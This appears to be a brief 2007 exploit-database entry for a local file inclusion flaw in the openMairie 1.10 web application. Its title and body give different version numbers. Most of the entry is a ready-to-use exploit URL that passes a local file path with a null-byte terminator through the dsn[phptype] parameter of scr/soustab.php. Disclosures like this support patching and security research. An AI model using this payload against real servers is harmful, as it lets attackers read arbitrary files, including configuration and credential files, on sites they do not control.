id: 1764
date: 04/15/2007
title: openMairie 1.10 (scr/soustab.php) Local File Inclusion Vulnerability
author: GoLd_M
cves: 

====================================================================
openMairie 1.10 (scr/soustab.php) Local File Inclusion Vulnerability
====================================================================



# openMairie 1.11(/scr/soustab.php)Local File Inclusion Vulnerabilitiy
# Discovered by: GolD_M = [Mahmood_ali]
# Exploit:[Path]/scr/soustab.php?dsn[phptype]=[ Local File ]%00



#  0day.today [2023-03-24]  #